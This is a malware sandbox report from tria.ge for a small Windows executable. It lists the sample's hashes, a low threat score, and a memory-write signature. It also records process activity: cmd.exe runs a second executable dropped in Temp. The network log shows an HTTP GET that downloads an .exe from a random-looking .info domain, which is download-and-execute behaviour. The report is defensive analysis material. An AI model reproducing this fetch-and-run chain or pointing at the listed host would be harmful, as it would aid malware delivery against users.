Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14/10/2023, 19:17 UTC
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
NEAS.dd38841a447bead5b8beabb267592510.exe
Resource
win7-20230831-en
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
NEAS.dd38841a447bead5b8beabb267592510.exe
Resource
win10v2004-20230915-en
1 signatures
150 seconds
General
-
Target
NEAS.dd38841a447bead5b8beabb267592510.exe
-
Size
5KB
-
MD5
dd38841a447bead5b8beabb267592510
-
SHA1
6b14e1db4af724dc90d4ac4f1b448534b08c27f1
-
SHA256
ab7f93b129946c311d08f101414530ceafaa15365c06522264b29ac7e9512f28
-
SHA512
f2e2a39da93258570e9f28be0db4d3fc1510ae05f24ae6a3159509e4e90bcd9eb3c521a16558f46b6149c49d897da0c32a23871a8bbc22006181fab09ba5e6d5
-
SSDEEP
48:6MjtHxWXZR/4plYRWhxeXzu6fvQJrONvTrg7GtGd9d/9orw2d03z:xtHwXZJ4plYRccjrfYJrO9Tr3aor
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1720 wrote to memory of 2664 1720 NEAS.dd38841a447bead5b8beabb267592510.exe 29 PID 1720 wrote to memory of 2664 1720 NEAS.dd38841a447bead5b8beabb267592510.exe 29 PID 1720 wrote to memory of 2664 1720 NEAS.dd38841a447bead5b8beabb267592510.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\20231015T091756_106.exe2⤵PID:2664
-
Network
-
Remote address:8.8.8.8:53Request20231015t091756_106.ltiapmyzmjxrvrts.infoIN AResponse20231015t091756_106.ltiapmyzmjxrvrts.infoIN CNAMEltiapmyzmjxrvrts.infoltiapmyzmjxrvrts.infoIN A54.37.238.86
-
GEThttp://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exeNEAS.dd38841a447bead5b8beabb267592510.exeRemote address:54.37.238.86:80RequestGET /v4/20231015T091756_106.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 20231015t091756_106.ltiapmyzmjxrvrts.info
Connection: Keep-Alive
-
54.37.238.86:80http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exehttpNEAS.dd38841a447bead5b8beabb267592510.exe524 B 92 B 3 2
HTTP Request
GET http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe